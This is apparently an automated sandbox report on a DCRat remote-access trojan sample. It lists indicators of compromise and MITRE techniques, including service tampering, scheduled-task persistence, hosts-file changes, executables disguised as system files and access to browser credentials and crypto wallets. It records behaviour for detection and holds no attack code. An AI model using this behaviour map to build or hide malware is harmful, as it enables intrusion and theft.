dcrat | 92386db4af8c8f4625192cbc5f8ec218cd4ae4fffa1ca1ff867bda9aefe13ad6

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Process spawned unexpected child process 27 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4476	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3920	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3364	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3824	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4620	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	548	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2804	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3156	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3348	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3584	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2548	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3252	1356	schtasks.exe	159
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3980	1356	schtasks.exe	159

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3048 created 5060	3048	WerFault.exe	219

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 3620 created 3220	3620	lopataminers.exe	68
PID 3620 created 3220	3620	lopataminers.exe	68
PID 3620 created 3220	3620	lopataminers.exe	68
PID 3620 created 3220	3620	lopataminers.exe	68
PID 3620 created 3220	3620	lopataminers.exe	68
PID 1168 created 620	1168	WerFault.exe	4
PID 3820 created 3692	3820	svchost.exe	41
PID 3820 created 2128	3820	svchost.exe	125
PID 3820 created 3564	3820	svchost.exe	66
PID 3820 created 5060	3820	svchost.exe	219
PID 3216 created 3220	3216	lopataminers.exe	68

DCRat payload 20 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000600000001db38-662.dat	dcrat
behavioral1/files/0x000600000001db38-663.dat	dcrat
behavioral1/files/0x000600000001db3d-672.dat	dcrat
behavioral1/files/0x000600000001db3d-675.dat	dcrat
behavioral1/files/0x000600000001db3d-677.dat	dcrat
behavioral1/files/0x000500000001e5a5-731.dat	dcrat
behavioral1/files/0x000500000001e5a5-732.dat	dcrat
behavioral1/memory/4016-733-0x00000000001E0000-0x00000000003AE000-memory.dmp	dcrat
behavioral1/files/0x000500000001e5c4-749.dat	dcrat
behavioral1/files/0x0003000000022514-772.dat	dcrat
behavioral1/files/0x0003000000022514-775.dat	dcrat
behavioral1/files/0x0003000000022514-787.dat	dcrat
behavioral1/files/0x0003000000022514-786.dat	dcrat
behavioral1/files/0x0003000000022514-785.dat	dcrat
behavioral1/files/0x0003000000022514-784.dat	dcrat
behavioral1/files/0x0003000000022514-783.dat	dcrat
behavioral1/files/0x0003000000022514-782.dat	dcrat
behavioral1/files/0x0003000000022514-781.dat	dcrat
behavioral1/files/0x0003000000022514-780.dat	dcrat
behavioral1/files/0x0003000000022514-778.dat	dcrat

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	MssurrogateMonitor.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	injector.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	injector.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	winrar-x64-621.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	MssurrogateMonitor.exe

Executes dropped EXE 24 IoCs

pid	Process
3912	winrar-x64-621.exe
2224	uninstall.exe
3808	WinRAR.exe
1476	injector.exe
4424	updater.exe
3620	lopataminers.exe
4292	chicka.exe
4016	MssurrogateMonitor.exe
4272	spoolsv.exe
2784	powershell.exe
4164	powershell.exe
2404	powershell.exe
4056	powershell.exe
2712	powershell.exe
3948	powershell.exe
2448	powershell.exe
3820	svchost.exe
404	powershell.exe
4272	spoolsv.exe
564	injector.exe
308	updater.exe
3216	lopataminers.exe
4620	chicka.exe
5116	MssurrogateMonitor.exe

Loads dropped DLL 1 IoCs

pid	Process
3220	Explorer.EXE

Modifies system executable filetype association 2 TTPs 8 IoCs

Modify Registry

Change Default File Association

T1042

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Registers COM server for autorun 1 TTPs 3 IoCs

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment"	uninstall.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	OfficeClickToRun.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	WerFault.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	DllHost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	WerFault.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3620 set thread context of 1196	3620	lopataminers.exe	160
PID 1168 set thread context of 4436	1168	WerFault.exe	205

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Rar.exe	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-621.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\5b884080fd4f94	MssurrogateMonitor.exe
File opened for modification	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\License.txt	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Rar.txt	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Resources.pri	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Resources.pri	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\License.txt	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Descript.ion	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Rar.exe	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-621.exe
File created	C:\Program Files\Windows Portable Devices\f85fc75a95db87	MssurrogateMonitor.exe
File opened for modification	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\rarnew.dat	uninstall.exe
File created	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Order.htm	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Default.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-621.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe	MssurrogateMonitor.exe
File opened for modification	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Order.htm	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\zipnew.dat	uninstall.exe
File created	C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240664359	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Descript.ion	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Default.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Rar.txt	winrar-x64-621.exe
File opened for modification	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-621.exe
File created	C:\Program Files\Windows Portable Devices\MssurrogateMonitor.exe	MssurrogateMonitor.exe
File created	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-621.exe
File created	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-621.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\NetworkService\RuntimeBroker.exe	MssurrogateMonitor.exe
File created	C:\Windows\ServiceProfiles\NetworkService\9e8d7a4ca61bd9	MssurrogateMonitor.exe
File created	C:\Windows\Containers\serviced\spoolsv.exe	MssurrogateMonitor.exe
File created	C:\Windows\Containers\serviced\f3b6ecef712a24	MssurrogateMonitor.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3912	sc.exe
3740	sc.exe
2188	sc.exe
2276	sc.exe
4944	sc.exe
5016	sc.exe
2404	sc.exe
3804	sc.exe
4340	sc.exe
4740	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
940	3692	WerFault.exe	41
3808	3564	WerFault.exe	66
1168	2128	WerFault.exe	125
4932	5060	WerFault.exe	219

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task

pid	Process
4476	schtasks.exe
548	schtasks.exe
4384	schtasks.exe
3156	schtasks.exe
3348	schtasks.exe
2012	schtasks.exe
3352	schtasks.exe
2804	schtasks.exe
2548	schtasks.exe
4152	schtasks.exe
4220	schtasks.exe
4360	schtasks.exe
2908	schtasks.exe
2172	schtasks.exe
3920	schtasks.exe
3824	schtasks.exe
4620	schtasks.exe
3060	schtasks.exe
3980	schtasks.exe
3372	schtasks.exe
3584	schtasks.exe
3252	schtasks.exe
2788	schtasks.exe
4100	schtasks.exe
3364	schtasks.exe
1064	schtasks.exe
4724	schtasks.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	WinRAR.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	WinRAR.exe
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Internet Explorer\IESettingSync	WinRAR.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	WinRAR.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
